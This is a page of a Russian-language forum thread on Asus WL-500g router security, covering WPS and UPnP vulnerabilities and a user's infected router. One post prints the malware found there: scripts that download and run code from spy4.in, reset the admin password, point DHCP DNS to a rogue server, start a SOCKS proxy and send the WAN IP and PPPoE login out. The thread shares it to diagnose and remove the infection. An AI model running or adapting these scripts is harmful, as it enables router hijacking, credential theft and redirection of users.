Page 3 of 4 FirstFirst 1234 LastLast
Results 31 to 45 of 130

Thread: Внимание! Безопасность Linux-based MIPSel роутеров!

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    Mar 2009
    Location
    Default City
    Posts
    2,694
    Blog Entries
    4
    Quote Originally Posted by vectorm View Post
    В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
    Поскольку обсуждать нечего - перенёс сюда.
    ААА можно немножко пофлудить? Раз уж подняли тут эту тему, то - Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

    Деклаймер - Естественно применяется только для нахождения забытого пароля к своей точке )
    Last edited by TReX; 15-05-2012 at 16:13.

  2. #2

    пароль к консоли

    коллеги, каюсь, помнил, но забыл.
    как посмотреть/поменять пароль рута из веб-морды?

    спасибо.

  3. #3
    Quote Originally Posted by TReX View Post
    Подбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того какая прошивка установленна на роутере) Используется как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )
    Тогда и я добавлю: взлом WPS.

    Сюда же: "Уголовный кодекс РФ (УК РФ). Статья 272. Неправомерный доступ к компьютерной информации."

    Quote Originally Posted by Pablo Escobar View Post
    коллеги, каюсь, помнил, но забыл.
    как посмотреть/поменять пароль рута из веб-морды?
    Как поменять из веб-морды? "System Setup" —> "Change Password"
    Из консоли посмотреть:
    nvram show | grep http_passwd
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / Принтер / etc

  4. #4
    Join Date
    Oct 2009
    Posts
    529
    Blog Entries
    1
    Quote Originally Posted by vectorm View Post
    В прошивках Олеги и Энтузиастов WPS нет как класса, соответственно, ломать нечего.
    Поскольку обсуждать нечего - перенёс сюда.
    топикстартер этого не увидел и всё еще волнуется
    Last edited by MercuryV; 15-05-2012 at 23:46. Reason: вслед за очередным переносом

  5. #5

    Exclamation Уязвимость WPS и прошивка "от олега"

    В связи найденной уязвимостью в wps, хочу узнать, работает ли он в прошивке "от олега". В оригинальной прошивке вроде есть и можно отключать.
    Роутер asus wl500gpv2.

  6. #6

    шпион на роутере

    Имею wl500gpv2 уже 3 года. Изучил полностью. Недавно перепрошил на последнюю прошивку от энтузиастов.
    были некоторые проблемы с samba (нет доступа с ipad из программы buzz player). поэтому отключил iptables (iptables -P FORWARD ACCEPT
    iptables -P INPUT ACCEPT).
    так и оставил. сегодня нужно было изменить некоторые скрипты. обратил внимание, что в /tmp/local/sbin много файлов. прибил лишние процессы и начал смотреть...
    содержимое post-firewall:
    Code:
    #!/bin/sh
    
    cd /usr/local/sbin
    wget -q http://spy4.in/data/tofire
    chmod +x tofire
    sh tofire
    rm -rf tofire
    добавился файл tocron:
    Code:
    #!/bin/sh
    cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo
    исполняемые 3proxy, proxy, udppm, socks и еще пару

    содержимое http://spy4.in/data/todo:
    Code:
    #!/bin/sh
    
    rip=`nvram get wan0_ipaddr`
    ilogin=`nvram get wan0_pppoe_username`
    sport=`cat /usr/local/etc/sport`
    sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
    wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
    rm -rf ttt
    содержимое http://spy4.in/data/tofire:
    Code:
    #!/bin/sh
    nvram set dhcp_dns1_x=217.12.219.20
    nvram set http_passwd=qweasdOP
    mount -obind /tmp/local /opt
    cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
    rm -rf /tmp/3.tgz
    mkdir /var/spool/cron/crontabs/ -p
    mv -f /tmp/local/admin /var/spool/cron/crontabs/
    chmod +x /var/spool/cron/crontabs/admin
    killall crond
    sleep 3
    crond
    crontab /var/spool/cron/crontabs/admin -u admin
    
    SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
    echo $SPORT > /usr/local/etc/sport
    echo "daemon
    nserver 8.8.8.8
    auth none
    socks -p$SPORT" > /usr/local/etc/3proxy.cfg
    killall 3proxy
    sleep 5
    3proxy /usr/local/etc/3proxy.cfg
    cd /usr/local/sbin && ./tocron
    особо ничего не вытянет (ip внутренний, iptables уже вкрутил, пароль поменял).
    Кто нибудь сталкивался с подобным? чем грозит как думаете? где еще чего посмотреть?

    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    Last edited by Visionary; 05-08-2012 at 11:41.

  7. #7
    Quote Originally Posted by Visionary View Post
    Кто нибудь сталкивался с подобным?
    А о чем, по-Вашему, эта тема?!

    Quote Originally Posted by Visionary View Post
    чем грозит как думаете?
    А чем может грозить захваченный роутер? Съесть Ваш трафик, "засветить" IP на сайтах противоправной направленности (экстремистских, распространяющих детское порно, и т. д.) и привлечь к этому IP внимание правоохранительных органов, перехватывать ваш трафик, в том числе пароли и куки, и использовать их для распространения спама... Продолжать?

    Quote Originally Posted by Visionary View Post
    где еще чего посмотреть?
    А что, в роутере дофига мест, "где посмотреть"?

    Quote Originally Posted by Visionary View Post
    upd проворонил что в dhcp изменен dns на левый. в результате происходит попытка заражения подсоединенных устройств (перекидывает на страницы с предложением обновить браузер.)
    Ставьте новую прошивку, делайте сброс в заводские установки, удаляёте всё с носителей и из flashfs. И не отключайте бездумно фаервол!
    © 2008-2013 ABATAPA WL-500gP/128M / Asus RT-N16 / USB Flash / VLAN / PPPoE / VoIP / nShaper / NAS: iStor is607, Sarotech NAS-20, QNap 109 Pro / NFS / Принтер / etc

  8. #8
    Join Date
    Mar 2008
    Location
    Korolev
    Posts
    2

    libupnp vulnerability

    В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?

  9. #9
    Quote Originally Posted by hairpin View Post
    В прошивке присутствует libupnp с обнаруженной уязвимостью http://seclists.org/bugtraq/2013/Jan/130 ?
    Где-то читал, что даже с внешнего интерфейса UPnP уязвим. Это правда?
    У нас уже давно miniupnpd вместо нее.

  10. #10
    Join Date
    Mar 2008
    Location
    Korolev
    Posts
    2
    Quote Originally Posted by AlexeyS View Post
    У нас уже давно miniupnpd вместо нее.
    Не одна libupnp уязвима, miniupnp 1.0 тоже
    Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method.
    http://web.nvd.nist.gov/view/vuln/de...=CVE-2013-0230
    Я проверил на своем RT-N16: на заводской прошивке 3.0.0.4.260 с включенным UPnP для теста Rapid7 оказался неуязвим.
    По данным Rapid7: "332 products use MiniUPnPd version 1.0, which is remotely exploitable. Over 69% of all MiniUPnPd fingerprints were version 1.0 or older."
    Last edited by hairpin; 02-02-2013 at 17:43.

  11. #11
    Я тоже проверил свой wl500gp с местной прошивкой, вердикт - не уязвим. Так что беспокоиться не о чем.

  12. #12
    Join Date
    Mar 2009
    Location
    Russia, Moscow
    Posts
    2,119
    Blog Entries
    33
    Критическая уязвимость во многих роутерах различных вендоров

    Как сообщалось ранее, компания DefenseCode обнаружила уязвимость нулевого дня в роутерах Cisco Linksys.
    Представители компании оповестили вендора и взяли тайм-аут на пару недель перед раскрытием деталей уязвимости.
    Время вышло, некоторые подробности были раскрыты и оказалось, что не только Cisco Linksys уязвима.
    Вот только часть вендоров, где присутствует уязвимость:

    • Asus
    • Broadcom
    • Cisco
    • D-Link
    • Netgear
    • TP-Link
    • Zyxel
    • US Robotics

    Речь идёт о сразу нескольких уязвимостях, которые кроются в ряде реализаций протокола UPnP и SSDP
    (основанные на Intel/Portable UPnP SDK и MiniUPnP SDK):

    • 1. CVE-2012-5958
    • 2. CVE-2012-5959
    • 3. CVE-2012-5960
    • 4. CVE-2012-5961
    • 5. CVE-2012-5962
    • 6. CVE-2012-5963
    • 7. CVE-2012-5964
    • 8. CVE-2012-5965
    • 9. CVE-2013-0229
    • 10. CVE-2013-0230

    Уязвимости позволяют вызвать отказ в обслуживании или выполнить произвольный код на устройстве без авторизации. А т.к. многие
    роутеры взаимодействуют с UPnP через WAN, это делает их уязвимыми не только к атаке из локальной сети, но и из удалённых сетей.

    Т.е. практически с любого компьютера Интернета. Уязвимыми могут оказаться не только роутеры, но вообще любое оборудование,
    использующее UPnP: принтеры, медиа-серверы, IP-камеры, NAS, smart TV и т.д. Т.е. речь идёт о миллионах устройств!
    http://habrahabr.ru/post/168613/ http://habrahabr.ru/post/165737/

  13. #13
    http://habrahabr.ru/post/168613/
    Оно нас не касается?

  14. #14
    Join Date
    Mar 2009
    Location
    Moscow
    Posts
    968
    D-Link DIR-320 A1/A2, DIR-620 C1, Netgear WNR3500L v1 v2

  15. #15
    Join Date
    Oct 2006
    Location
    St. Petersburg
    Posts
    126

    Red face

    Плакал на этим постом
    Ну и собственно в видео показывающее эту уязвимость атака на роутер почему то была из лан сети, т.е. роутер они ломали по адресу 192.168.1.1
    Last edited by KOCTET; 08-02-2013 at 07:22.

Page 3 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. Oscam fьr Mipsel Router
    By N3m3515 in forum German Discussion - Deutsch (DE)
    Replies: 7
    Last Post: 28-03-2015, 04:31
  2. Безопасность SSH (dropbear)
    By SergeyVl in forum Russian Discussion - РУССКИЙ (RU)
    Replies: 309
    Last Post: 28-02-2013, 13:09
  3. Replies: 2
    Last Post: 24-03-2009, 16:18
  4. New 1.0.4.6 based custom firmware
    By kfurge in forum WL-700g Firmware Discussion
    Replies: 272
    Last Post: 20-11-2007, 16:15
  5. Recompiling with mipsel
    By smarechal in forum WL-500g Custom Development
    Replies: 6
    Last Post: 21-03-2005, 11:48

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •